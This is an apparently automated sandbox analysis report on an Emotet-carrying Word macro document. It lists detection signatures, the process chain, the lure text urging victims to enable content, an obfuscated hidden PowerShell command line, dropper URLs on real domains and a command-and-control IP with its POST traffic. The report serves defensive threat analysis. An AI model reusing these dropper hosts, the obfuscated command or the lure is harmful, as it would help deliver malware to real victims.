Analysis Report pack-91089 416755919.doc

Overview

General Information

Sample Name: pack-91089 416755919.doc
Analysis ID: 336489
MD5: 1dc95341c113473f3ac71d3fccdc3512
SHA1: d07202389ee1458cd8d3f8f000701bc537ec6797
SHA256: 700f121e98f06604e45498c6313d741f4c43582fa41e1cdda3ae1b0e17e1e62c

Detection

Emotet
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
System process connects to network (likely due to code injection or exploit)
Yara detected Emotet
Creates processes via WMI
Document contains an embedded VBA macro with suspicious strings
Document contains an embedded VBA with base64 encoded strings
Document contains an embedded VBA with many GOTO operations indicating source code obfuscation
Encrypted powershell cmdline option found
Hides that the sample has been downloaded from the Internet (zone.identifier)
Obfuscated command line found
Potential dropper URLs found in powershell memory
PowerShell case anomaly found
Sigma detected: Suspicious Encoded PowerShell Command Line
Suspicious powershell command line found
Very long command line found
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Enables debug privileges
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Startup

  • System is w7x64
  • WINWORD.EXE (PID: 2364 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding MD5: 95C38D04597050285A18F66039EDB456)
  • cmd.exe (PID: 684 cmdline: cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD 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 MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
    • msg.exe (PID: 1276 cmdline: msg user /v Word experienced an error trying to open the file. MD5: 2214979661E779C3E3C33D4F14E6F3AC)
    • powershell.exe (PID: 2556 cmdline: POwersheLL -w hidden -ENCOD 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 MD5: 852D67A27E454BD389FA7F02A8CBE23F)
      • rundll32.exe (PID: 2332 cmdline: 'C:\Windows\system32\rundll32.exe' C:\Users\user\Nspzvsg\Sj_dwgs\R31N.dll Control_RunDLL MD5: DD81D91FF3B0763C392422865C9AC12E)
        • rundll32.exe (PID: 2824 cmdline: 'C:\Windows\system32\rundll32.exe' C:\Users\user\Nspzvsg\Sj_dwgs\R31N.dll Control_RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)
          • rundll32.exe (PID: 2712 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Czsbnlmzhou\heljhxhmap.nib',Control_RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)
            • rundll32.exe (PID: 2932 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Tshsltpdkbydgac\umncisajimhcut.zje',Control_RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)
              • rundll32.exe (PID: 2488 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Nrnhwjwgkqopncg\hahzpwlqhuedal.zvs',Control_RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                • rundll32.exe (PID: 2904 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Wcuhm\nost.bdw',Control_RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                  • rundll32.exe (PID: 2856 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Omzikkfxzmn\texvcnoeud.iob',Control_RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                    • rundll32.exe (PID: 2408 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Afhsry\advki.tth',Control_RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                      • rundll32.exe (PID: 3052 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Tjgkecgvqxx\dxuouhyssc.uio',Control_RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
0000000E.00000002.2347951504.0000000000221000.00000020.00000001.sdmp | JoeSecurity_Emotet | Yara detected Emotet | Joe Security
0000000C.00000002.2117427965.00000000006C1000.00000020.00000001.sdmp | JoeSecurity_Emotet | Yara detected Emotet | Joe Security
0000000C.00000002.2115320504.0000000000200000.00000040.00000001.sdmp | JoeSecurity_Emotet | Yara detected Emotet | Joe Security
00000008.00000002.2108163281.00000000001C0000.00000040.00000001.sdmp | JoeSecurity_Emotet | Yara detected Emotet | Joe Security
00000007.00000002.2106729405.00000000001D0000.00000040.00000001.sdmp | JoeSecurity_Emotet | Yara detected Emotet | Joe Security

Unpacked PEs

Source | Rule | Description | Author | Strings
9.2.rundll32.exe.1b0000.0.raw.unpack | JoeSecurity_Emotet | Yara detected Emotet | Joe Security
10.2.rundll32.exe.270000.1.unpack | JoeSecurity_Emotet | Yara detected Emotet | Joe Security
11.2.rundll32.exe.180000.0.raw.unpack | JoeSecurity_Emotet | Yara detected Emotet | Joe Security
8.2.rundll32.exe.1e0000.1.unpack | JoeSecurity_Emotet | Yara detected Emotet | Joe Security
7.2.rundll32.exe.230000.1.unpack | JoeSecurity_Emotet | Yara detected Emotet | Joe Security

                      Sigma Overview

                      System Summary:

                      Sigma detected: Suspicious Encoded PowerShell Command Line
                      Source: Process started; Author: Florian Roth, Markus Neis; Data: Command: POwersheLL -w hidden -ENCOD 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

                      Signature Overview

                      AV Detection:

                      Antivirus detection for URL or domain
                      Source: http://veterinariadrpopui.com/content/5f18Q/ Avira URL Cloud: Label: malware
                      Source: http://khanhhoahomnay.net/wordpress/CGMC/ Avira URL Cloud: Label: malware
                      Source: http://shop.elemenslide.com/wp-content/n/ Avira URL Cloud: Label: malware
                      Multi AV Scanner detection for submitted file
                      Source: pack-91089 416755919.doc Virustotal: Detection: 36%
                      Source: pack-91089 416755919.doc ReversingLabs: Detection: 43%
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_100011C0 Control_RunDLL,VirtualAlloc,VirtualAlloc,GetModuleHandleExA,VirtualAlloc,GetProcAddress,GetProcAddress,VirtualAlloc,GetProcAddress,LdrFindResource_U,LdrAccessResource,CryptAcquireContextW,CryptAcquireContextW,CryptAcquireContextW,CryptAcquireContextW,CryptCreateHash,CryptHashData,CryptDeriveKey,VirtualAlloc,_memmove,CryptEncrypt,7_2_100011C0
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_100021F0 CryptStringToBinaryW,CoTaskMemAlloc,CryptStringToBinaryW,StgDeserializePropVariant,CoTaskMemFree,7_2_100021F0
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10002730 StgSerializePropVariant,CryptBinaryToStringW,CoTaskMemAlloc,CryptBinaryToStringW,CoTaskMemFree,CoTaskMemFree,7_2_10002730
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_002275AE CryptDecodeObjectEx,14_2_002275AE
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0022109C FindFirstFileW,14_2_0022109C
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
                      Source: global traffic DNS query: name: wpsapk.com
                      Source: global traffic TCP traffic: 192.168.2.22:49165 -> 104.18.61.59:80

                      Networking:

                      Potential dropper URLs found in powershell memory
                      Source: powershell.exe, 00000005.00000002.2111561067.00000000036D3000.00000004.00000001.sdmp String found in memory: http://wpsapk.com/wp-admin/v/
                      Source: powershell.exe, 00000005.00000002.2111561067.00000000036D3000.00000004.00000001.sdmp String found in memory: http://sofsuite.com/wp-includes/2jm3nIk/
                      Source: powershell.exe, 00000005.00000002.2111561067.00000000036D3000.00000004.00000001.sdmp String found in memory: http://veterinariadrpopui.com/content/5f18Q/
                      Source: powershell.exe, 00000005.00000002.2111561067.00000000036D3000.00000004.00000001.sdmp String found in memory: http://shop.elemenslide.com/wp-content/n/
                      Source: powershell.exe, 00000005.00000002.2111561067.00000000036D3000.00000004.00000001.sdmp String found in memory: http://khanhhoahomnay.net/wordpress/CGMC/
                      Source: powershell.exe, 00000005.00000002.2111561067.00000000036D3000.00000004.00000001.sdmp String found in memory: http://campusexpo.org/department-of-odhmmkd/95eXZY/
                      Source: powershell.exe, 00000005.00000002.2111561067.00000000036D3000.00000004.00000001.sdmp String found in memory: https://gurztac.wtchevalier.com/wp-content/YzZ6YZ/
                      Source: global traffic HTTP traffic detected: GET /wp-admin/v/ HTTP/1.1 Host: wpsapk.com Connection: Keep-Alive
                      Source: global traffic HTTP traffic detected: GET /wp-includes/2jm3nIk/ HTTP/1.1 Host: sofsuite.com Connection: Keep-Alive
                      Source: global traffic HTTP traffic detected: GET /content/5f18Q/ HTTP/1.1 Host: veterinariadrpopui.com Connection: Keep-Alive
                      Source: global traffic HTTP traffic detected: GET /wordpress/CGMC/ HTTP/1.1 Host: khanhhoahomnay.net Connection: Keep-Alive
                      Source: Joe Sandbox View IP Address: 209.59.139.39
                      Source: Joe Sandbox View IP Address: 5.2.136.90
                      Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS
                      Source: Joe Sandbox View ASN Name: LIQUIDWEBUS
                      Source: global traffic HTTP traffic detected: POST /9ormjijma/sd2xibclmrp5oftlrxf/ HTTP/1.1 DNT: 0 Referer: 5.2.136.90/9ormjijma/sd2xibclmrp5oftlrxf/ Content-Type: multipart/form-data; boundary=-------------qEVZIKHrPRVz2 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: 5.2.136.90 Content-Length: 8452 Connection: Keep-Alive Cache-Control: no-cache
                      Source: unknown TCP traffic detected without corresponding DNS query: 5.2.136.90
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0023023A InternetReadFile,14_2_0023023A
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{43B9F0D0-FFD8-4816-B513-C2DC6937B540}.tmp
                      Source: rundll32.exe, 00000006.00000002.2113194713.0000000001B10000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2108067527.0000000002200000.00000002.00000001.sdmp String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
                      Source: unknown DNS traffic detected: queries for: wpsapk.com
                      Source: unknown HTTP traffic detected: POST /9ormjijma/sd2xibclmrp5oftlrxf/ HTTP/1.1 DNT: 0 Referer: 5.2.136.90/9ormjijma/sd2xibclmrp5oftlrxf/ Content-Type: multipart/form-data; boundary=-------------qEVZIKHrPRVz2 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: 5.2.136.90 Content-Length: 8452 Connection: Keep-Alive Cache-Control: no-cache

                      E-Banking Fraud:

                      Yara detected Emotet

                      System Summary:

                      Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
                      Source: Screenshot number: 4, Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. 0 Page: I of I Words:
                      Source: Screenshot number: 4, Screenshot OCR: DOCUMENT IS PROTECTED. I Previewing is not available for protected documents. You have to press "E
                      Source: Screenshot number: 4, Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
                      Source: Screenshot number: 4, Screenshot OCR: ENABLE CONTENT" buttons to preview this document. 0 Page: I of I Words: 3 N@m 13 ;a 10096 G)
                      Source: Screenshot number: 8, Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. K O a S
                      Source: Screenshot number: 8, Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
                      Source: Screenshot number: 8, Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
                      Source: Screenshot number: 8, Screenshot OCR: ENABLE CONTENT" buttons to preview this document. K O a S
                      Source: Document image extraction number: 0, Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
                      Source: Document image extraction number: 0, Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
                      Source: Document image extraction number: 0, Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
                      Source: Document image extraction number: 1, Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
                      Source: Document image extraction number: 1, Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
                      Source: Document image extraction number: 1, Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
                      Source: Document image extraction number: 1, Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
                      Document contains an embedded VBA macro with suspicious strings
                      Source: pack-91089 416755919.docOLE, VBA macro line: Set SblcDCC = pULquU.CreateTextFile("OMySJHB:\AyVGlHzV\jPNIAFF.VJueCC")
                      Document contains an embedded VBA with base64 encoded strings
                      Very long command line found
                      Source: unknown, Process created: Commandline size = 5709
                      Source: unknown, Process created: Commandline size = 5613
                      Source: C:\Windows\System32\cmd.exe, Process created: Commandline size = 5613
                      Source: C:\Windows\SysWOW64\rundll32.exe, Memory allocated: 76E20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exe, Memory allocated: 76D20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exe, File created: C:\Windows\SysWOW64\Czsbnlmzhou\
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00272A3010_2_00272A30
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0028340A10_2_0028340A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00287A0F10_2_00287A0F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00285A6110_2_00285A61
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0028687F10_2_0028687F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0027F44410_2_0027F444
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0027EA4C10_2_0027EA4C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0027E05A10_2_0027E05A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_002762A310_2_002762A3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0028A0AF10_2_0028A0AF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_002748BD10_2_002748BD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_002780BA10_2_002780BA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_002760B910_2_002760B9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0027128010_2_00271280
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0028889D10_2_0028889D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_002788E510_2_002788E5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_002812E210_2_002812E2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00271CFA10_2_00271CFA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_002826F510_2_002826F5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_002796CD10_2_002796CD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_002820C510_2_002820C5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00288ADC10_2_00288ADC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0027F53610_2_0027F536
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0027153C10_2_0027153C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00280D3310_2_00280D33
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0027BB3A10_2_0027BB3A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00280F0C10_2_00280F0C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00287D0310_2_00287D03
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0028511B10_2_0028511B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00288D1C10_2_00288D1C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00285D1D10_2_00285D1D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0027B11210_2_0027B112
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00287F1F10_2_00287F1F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00282B1610_2_00282B16
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00280B6810_2_00280B68
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0027C76910_2_0027C769
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0027E37710_2_0027E377
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0028177310_2_00281773
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00275B7910_2_00275B79
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00278F7810_2_00278F78
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0028234910_2_00282349
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00288F4910_2_00288F49
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00289B4510_2_00289B45
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0027675410_2_00276754
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0027B75F10_2_0027B75F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_002873AC10_2_002873AC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_002769A010_2_002769A0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_002717AC10_2_002717AC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_002861B810_2_002861B8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00286DB910_2_00286DB9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0028878F10_2_0028878F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0027F98C10_2_0027F98C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0028958610_2_00289586
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00276D9F10_2_00276D9F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0027839D10_2_0027839D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0027799810_2_00277998
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_002867E910_2_002867E9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_002871EF10_2_002871EF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_002831E210_2_002831E2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0027D7EB10_2_0027D7EB
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00283FE710_2_00283FE7
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00281BDF10_2_00281BDF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00279FDC10_2_00279FDC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001AB41F11_2_001AB41F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001AEE7811_2_001AEE78
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001A2C6311_2_001A2C63
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001B389511_2_001B3895
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001A568E11_2_001A568E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001B42DA11_2_001B42DA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001B02C311_2_001B02C3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001AC0C611_2_001AC0C6
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001A873611_2_001A8736
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001B4B4111_2_001B4B41
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001A7B6311_2_001A7B63
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001B63C111_2_001B63C1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001B340A11_2_001B340A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001B7A0F11_2_001B7A0F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001A2A3011_2_001A2A30
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001A9A3711_2_001A9A37
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001A4A3511_2_001A4A35
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001AE05A11_2_001AE05A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001AEA4C11_2_001AEA4C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001AF44411_2_001AF444
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001B687F11_2_001B687F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001B5A6111_2_001B5A61
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001B889D11_2_001B889D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001A128011_2_001A1280
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001A80BA11_2_001A80BA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001A60B911_2_001A60B9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001A48BD11_2_001A48BD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001BA0AF11_2_001BA0AF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001A62A311_2_001A62A3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001B8ADC11_2_001B8ADC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001A96CD11_2_001A96CD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001B20C511_2_001B20C5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001A1CFA11_2_001A1CFA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001B26F511_2_001B26F5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001B12E211_2_001B12E2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001A88E511_2_001A88E5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001B511B11_2_001B511B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001B7F1F11_2_001B7F1F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001B5D1D11_2_001B5D1D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001B8D1C11_2_001B8D1C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001AB11211_2_001AB112
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001B2B1611_2_001B2B16
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001B0F0C11_2_001B0F0C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001B7D0311_2_001B7D03
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001ABB3A11_2_001ABB3A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001A153C11_2_001A153C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001B0D3311_2_001B0D33
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001AF53611_2_001AF536
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001AB75F11_2_001AB75F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001A675411_2_001A6754
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001B234911_2_001B2349
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001B8F4911_2_001B8F49
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001B9B4511_2_001B9B45
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001A8F7811_2_001A8F78
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001A5B7911_2_001A5B79
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001B177311_2_001B1773
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001AE37711_2_001AE377
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001AC76911_2_001AC769
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001B0B6811_2_001B0B68
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001A799811_2_001A7998
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001A6D9F11_2_001A6D9F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001A839D11_2_001A839D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001B878F11_2_001B878F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001AF98C11_2_001AF98C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001B958611_2_001B9586
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001B6DB911_2_001B6DB9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001B61B811_2_001B61B8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001A17AC11_2_001A17AC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001B73AC11_2_001B73AC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001A69A011_2_001A69A0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001B1BDF11_2_001B1BDF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001A9FDC11_2_001A9FDC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001AD7EB11_2_001AD7EB
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001B67E911_2_001B67E9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001B71EF11_2_001B71EF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001B31E211_2_001B31E2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001B3FE711_2_001B3FE7
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_006C2C6312_2_006C2C63
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_006CEE7812_2_006CEE78
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_006CB41F12_2_006CB41F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_006CC0C612_2_006CC0C6
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_006D02C312_2_006D02C3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_006D42DA12_2_006D42DA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_006C568E12_2_006C568E
